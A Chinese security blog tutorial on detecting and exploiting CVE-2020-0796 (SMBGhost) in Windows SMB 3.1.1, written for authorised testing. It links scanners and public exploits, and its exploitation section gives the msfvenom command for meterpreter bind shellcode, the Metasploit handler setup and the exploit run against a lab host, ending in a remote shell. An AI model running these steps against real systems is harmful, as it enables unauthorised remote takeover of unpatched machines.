0x01漏洞描述

2020年3月12日,微软正式发布CVE-2020-0796高危漏洞补丁,目前,远程利用poc代码已公布,本文介绍cve-2020-0796漏洞的检测及利用,来协助大家对未修复的漏洞检测和防御。漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被者利用远程执行任意代码。者利用该漏洞无须权限即可实现远程代码执行,受**的目标系统只需开机在线即可能被***。

0x02 影响版本

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

0x03 漏洞检测

脚本检测
https://github.com/ollypwn/SMBGhost
检测返回的smb的版本,这种检测方式存在一定的误报
CVE-2020-0796 漏洞检测及利用工具_第1张图片
CVE-2020-0796 漏洞检测及利用工具_第2张图片

可以发现检测出存在该漏洞
https://github.com/joaozietolie/CVE-2020-0796-Checker
利用nmap脚本检测方式检测
CVE-2020-0796 漏洞检测及利用工具_第3张图片
CVE-2020-0796 漏洞检测及利用工具

奇安信检测工具
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
CVE-2020-0796 漏洞检测及利用工具_第4张图片

0X04漏洞利用

本地提权
https://github.com/danigargu/CVE-2020-0796
本地普通权限用户通过exp提权后,成功的获取了系统的system权限
CVE-2020-0796 漏洞检测及利用工具_第5张图片
远程poc利用
https://github.com/chompie1337/SMBGhost_RCE_PoC
首先下载远程利用poc
CVE-2020-0796 漏洞检测及利用工具_第6张图片
利用msf生成shellcode

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

CVE-2020-0796 漏洞检测及利用工具_第7张图片
把buf 替换成USER_PAYLOAD
CVE-2020-0796 漏洞检测及利用工具_第8张图片
开启msf监听

use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.10.183
run

CVE-2020-0796 漏洞检测及利用工具_第9张图片
运行exp
python3 exploit.py -ip 192.168.10.183
CVE-2020-0796 漏洞检测及利用工具_第10张图片
可以看到我们返回了一个meterpreter

免责申明:    
本项目仅进行信息搜集,漏洞探测工作,无漏洞利用、***性行为,发文初衷为仅为方便安全人员对授权项目完成测试工作和学习交流使用。       请使用者遵守当地相关法律,勿用于非授权测试,勿用于非授权测试,勿用于非授权测试(重要的事情说三遍),如作他用所承受的法律责任一概与东塔安全学院无关!!!